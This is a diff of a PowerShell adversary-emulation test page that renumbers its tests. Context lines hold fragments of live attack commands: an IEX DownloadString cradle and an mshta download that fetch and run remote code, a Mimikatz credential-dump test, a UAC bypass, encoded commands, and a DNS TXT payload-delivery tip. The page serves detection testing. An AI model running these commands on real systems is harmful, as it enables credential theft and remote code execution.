+## Atomic Test #4 - Mimikatz - Cradlecraft PsSendKeys
 Run mimikatz via PsSendKeys. Upon execution, automated actions will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed.
 
 **Supported Platforms:** Windows
@@ -233,7 +201,7 @@ $url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b10
 <br/>
 <br/>
 
-## Atomic Test #6 - Invoke-AppPathBypass
+## Atomic Test #5 - Invoke-AppPathBypass
 Note: Windows 10 only. Upon execution windows backup and restore window will be opened.
 
 Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/
@@ -263,7 +231,7 @@ Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githu
 <br/>
 <br/>
 
-## Atomic Test #7 - Powershell MsXml COM object - with prompt
+## Atomic Test #6 - Powershell MsXml COM object - with prompt
 Powershell MsXml COM object. Not proxy aware, removing cache although does not appear to write to those locations. Upon execution, "Download Cradle test success!" will be displayed.
 
 Provided by https://github.com/mgreen27/mgreen27.github.io
@@ -298,7 +266,7 @@ powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.S
 <br/>
 <br/>
 
-## Atomic Test #8 - Powershell XML requests
+## Atomic Test #7 - Powershell XML requests
 Powershell xml download request. Upon execution, "Download Cradle test success!" will be dispalyed.
 
 Provided by https://github.com/mgreen27/mgreen27.github.io
@@ -333,7 +301,7 @@ Provided by https://github.com/mgreen27/mgreen27.github.io
 <br/>
 <br/>
 
-## Atomic Test #9 - Powershell invoke mshta.exe download
+## Atomic Test #8 - Powershell invoke mshta.exe download
 Powershell invoke mshta to download payload. Upon execution, a new PowerShell window will be opened which will display "Download Cradle test success!".
 
 Provided by https://github.com/mgreen27/mgreen27.github.io
@@ -368,7 +336,7 @@ C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}'
 <br/>
 <br/>
 
-## Atomic Test #10 - Powershell Invoke-DownloadCradle
+## Atomic Test #9 - Powershell Invoke-DownloadCradle
 Provided by https://github.com/mgreen27/mgreen27.github.io
 Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
 
@@ -394,7 +362,7 @@ Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
 <br/>
 <br/>
 
-## Atomic Test #11 - PowerShell Fileless Script Execution
+## Atomic Test #10 - PowerShell Fileless Script Execution
 Execution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections. Upon exection, open "C:\Windows\Temp" and verify that
 art-marker.txt is in the folder.
 
@@ -430,7 +398,7 @@ Remove-Item HKCU:\Software\Classes\AtomicRedTeam -Force -ErrorAction Ignore
 <br/>
 <br/>
 
-## Atomic Test #12 - NTFS Alternate Data Stream Access
+## Atomic Test #11 - NTFS Alternate Data Stream Access
 Creates a file with an alternate data stream and simulates executing that hidden code/file. Upon execution, "Stream Data Executed" will be displayed.
 
 **Supported Platforms:** Windows
@@ -481,7 +449,7 @@ Write-Host Prereq's for this test cannot be met automatically
 <br/>
 <br/>
 
-## Atomic Test #13 - PowerShell Session Creation and Use
+## Atomic Test #12 - PowerShell Session Creation and Use
 Connect to a remote powershell session and interact with the host.
 Upon execution, network test info and 'T1086 PowerShell Session Creation and Use' will be displayed.
 
@@ -537,7 +505,7 @@ Enable-PSRemoting
 <br/>
 <br/>
 
-## Atomic Test #14 - ATHPowerShellCommandLineParameter -Command parameter variations
+## Atomic Test #13 - ATHPowerShellCommandLineParameter -Command parameter variations
 Executes powershell.exe with variations of the -Command parameter
 
 **Supported Platforms:** Windows
@@ -585,7 +553,7 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
 <br/>
 <br/>
 
-## Atomic Test #15 - ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments
+## Atomic Test #14 - ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments
 Executes powershell.exe with variations of the -Command parameter with encoded arguments supplied
 
 **Supported Platforms:** Windows
@@ -634,7 +602,7 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
 <br/>
 <br/>
 
-## Atomic Test #16 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations
+## Atomic Test #15 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations
 Executes powershell.exe with variations of the -EncodedCommand parameter
 
 **Supported Platforms:** Windows
@@ -682,7 +650,7 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
 <br/>
 <br/>
 
-## Atomic Test #17 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments
+## Atomic Test #16 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments
 Executes powershell.exe with variations of the -EncodedCommand parameter with encoded arguments supplied
 
 **Supported Platforms:** Windows
@@ -731,7 +699,7 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
 <br/>
 <br/>
 
-## Atomic Test #18 - PowerShell Command Execution
+## Atomic Test #17 - PowerShell Command Execution
 Use of obfuscated PowerShell to execute an arbitrary command; outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary.
 
 **Supported Platforms:** Windows
@@ -764,7 +732,7 @@ powershell.exe -e  #{obfuscated_code}
 <br/>
 <br/>
 
-## Atomic Test #19 - PowerShell Invoke Known Malicious Cmdlets
+## Atomic Test #18 - PowerShell Invoke Known Malicious Cmdlets
 Powershell execution of known Malicious PowerShell Cmdlets
 
 **Supported Platforms:** Windows
@@ -801,7 +769,7 @@ foreach ($cmdlets in $malcmdlets) {
 <br/>
 <br/>
 
-## Atomic Test #20 - PowerUp Invoke-AllChecks
+## Atomic Test #19 - PowerUp Invoke-AllChecks
 Check for privilege escalation paths using PowerUp from PowerShellMafia
 
 **Supported Platforms:** Windows
@@ -831,7 +799,7 @@ Invoke-AllChecks
 <br/>
 <br/>
 
-## Atomic Test #21 - Abuse Nslookup with DNS Records
+## Atomic Test #20 - Abuse Nslookup with DNS Records
 Red teamer's avoid IEX and Invoke-WebRequest in your PowerShell commands. Instead, host a text record with a payload to compromise hosts.
 [reference](https://twitter.com/jstrosch/status/1237382986557001729)